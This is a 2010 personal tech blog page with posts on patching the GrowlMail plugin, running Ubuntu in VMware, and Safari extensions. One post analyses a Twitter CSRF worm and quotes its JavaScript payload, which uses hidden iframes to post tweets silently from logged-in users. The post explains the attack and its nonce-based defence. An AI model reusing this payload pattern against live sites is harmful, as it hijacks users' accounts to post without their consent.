Fixing GrowlMail in 10.6.5 (Mail 4.4)

Posted by on October 14, 2010 73 comments

Update: Fix for 10.6.7 and Mail 4.5

Another OS X release (beta as of this posting), another broken GrowlMail bundle. I did a post just like this for 10.6.2 (and 10.6.4). Check it out if you want more background on why this occurs.

Easy Fix

Download a pre-patched GrowlMail.bundle and drop it in your ~/Library/Mail/Bundles/ directory1. If you want it available to multiple users on your system, use /Library/Mail/Bundles/.

Download GrowlMail 10.6.5 mailbundle

If you use this method you’re all set; no need to use the command line solution below.

Add New UUIDs to SupportedPluginCompatibilityUUIDs

If you have already had your plugins disabled by opening Mail.app you’ll need to look in ~/Library/Mail (or /Library/Mail if you installed globally) and move the files back to the active bundles directory. They’ll typically be in Bundles (Disabled), so quit Mail, find them, and move them back into the proper directory.

If you have a local installation:

defaults write ~/Library/Mail/Bundles/GrowlMail.mailbundle/Contents/Info SupportedPluginCompatibilityUUIDs -array-add "857A142A-AB81-4D99-BECC-D1B55A86D94E"
defaults write ~/Library/Mail/Bundles/GrowlMail.mailbundle/Contents/Info SupportedPluginCompatibilityUUIDs -array-add "BDD81F4D-6881-4A8D-94A7-E67410089EEB"

Global installation:

defaults write /Library/Mail/Bundles/GrowlMail.mailbundle/Contents/Info SupportedPluginCompatibilityUUIDs -array-add "857A142A-AB81-4D99-BECC-D1B55A86D94E"
defaults write /Library/Mail/Bundles/GrowlMail.mailbundle/Contents/Info SupportedPluginCompatibilityUUIDs -array-add "BDD81F4D-6881-4A8D-94A7-E67410089EEB"
  1. ~ means your home directory if you’re unfamiliar with the syntax. You can click the home icon on your Finder sidebar if you’re still confused

Ubuntu 10.10 (Maverick Meerkat) In VMware Fusion

Posted by on October 2, 2010 No comments

I decided to check out Ubuntu 10.10 RC today and I’m pleased to report that installation of the latest version in VMware Fusion (3.1.1) was trivial. I grabbed the install CD, told it to use “easy install” and away it went. Mouse ungrab, drag/drop file sharing, sound, et cetera were all available as soon as the GUI came up after the VMware tools install completed. HGFS was available as well under /mnt/hgfs. If you’re running an older version of VMware you may need to upgrade or grab the latest tools1 to have such a smooth experience.

  1. My version is 8.4.3

CSRF Matters (Or: Why Twitter Users Don’t Actually Love Anal Sex With Goats)

Posted by on September 26, 2010 2 comments

Update: Twitter has disabled this vector by removing the /share/update method to automatically tweet a status. This will prevent future attacks of this type.1

A new “worm” is making the rounds on Twitter this morning, driven by a t.co link. At first glance this might seem to be a flaw similar to the one from just a few days ago, but it’s not. Let’s take a look at the payload.

var el1 = document.createElement('iframe');
var el2 = document.createElement('iframe');
el1.style.visibility="hidden";
el2.style.visibility="hidden";
el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location;
el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats";
document.getElementsByTagName("body")[0].appendChild(el1);
document.getElementsByTagName("body")[0].appendChild(el2);

Amazingly simple right? All the page does is create two hidden iframes, set their src to be a URL that will tweet those two updates, then appends them to the body of the page. From the user’s perspective all that happens is a blank page when they click the link, but in reality it has just sent a copy of its own URL + “i love anal sex with goats” back to Twitter. This will only work if you’re currently logged in, but that’s not much of an obstacle.

So how do you stop cross site request forgery (CSRF) requests like this? One way is to generate a nonce for requests and require it to be sent along when triggering an update.2 That would have stopped this worm in its tracks, but at the expense of disabling easy updates to Twitter from other websites.

Given the rapid rise of Twitter and people’s increasing reliance on the sanctity of their timelines this type of attack will almost certainly become more common until Twitter chooses to change their rules. As always, the tradeoff of convenience and security is a tough decision.

  1. Other potential vectors like /home?status require user interaction, so alternate methods will have to be developed by worm authors.
  2. OWASP has more information and reference implementations to protect against CSRF, XSS, and more.

AvianSafari 1.0.2

Posted by on August 24, 2010 No comments

Just a quick note that AvianSafari 1.0.2 has been released. If you’re on a previous version you should upgrade immediately since the API key was reset (I foolishly committed it to my local repo and forgot I was planning on pushing it to a public Github repository). If you’re seeing Twitter authentication requests in Safari then that’s the manifestation of the issue. Sorry about that!

Download now!

AvianSafari, A Safari Extension

Posted by on August 19, 2010 No comments

I’m extremely proud to announce AvianSafari, a browser bar based Twitter client for Safari. You should check it out right now and then come back and read about it. I can wait.

Okay, now that you’ve got it installed we can move on. AvianSafari supports the following:

  • Home Timeline
  • Mentions
  • Sent Direct Messages
  • Received Direct Messages
  • Tweet Pagination (Scroll Wheel or Arrow Buttons)
  • Unread Tracking
  • Search
  • Trends
  • Native Retweet
  • Reply
  • Tweeting
  • Delete Tweets
  • Sending Direct Messages
  • URL Shortening (TinyURL, TinyVH, bit.ly, j.mp, is.gd)
  • Authenticated URL shortening for bit.ly / j.mp
  • Variable Update Interval
  • Controllable Link Behavior (new tab, current tab, tab position, et cetera)
  • Conversation threads
  • Linking @mentions and URLs
  • Much, much more!

For communication with Twitter I created AvianLib, an OAuth/Twitter library written in Javascript. I’ll be putting AvianLib up as a separate project on Github in the near future so others can consume it. If you’d like to take a look at AvianSafari’s source code or provide feedback head on over!

AvianSafari Product Page

Big thanks to Brian Kim (icons), Matt Pennig (general JS guru), and Clay Benson (website).

Optimize Legibility (Safari Extension)

Posted by on June 29, 2010 19 comments


View All My Safari Extensions

John Gruber linked to an article about the text-rendering:optimizeLegibility CSS property today and as he said, news to me. I’ve built a quick Safari extension to enable it by default in Safari (Firefox already does this). So, without further ado:

Optimize Legibility is a simple Safari extension that injects a single CSS attribute (text-rendering:optimizeLegibility) into every page. This will improve kerning and ligatures in text.

Download it or view the (trivial) source at Github.

Update: 1.0.2 adds an icon and reverts the CSS to matching body rather than wildcard. Should improve performance (although it won’t be noticeably faster on any modern machine).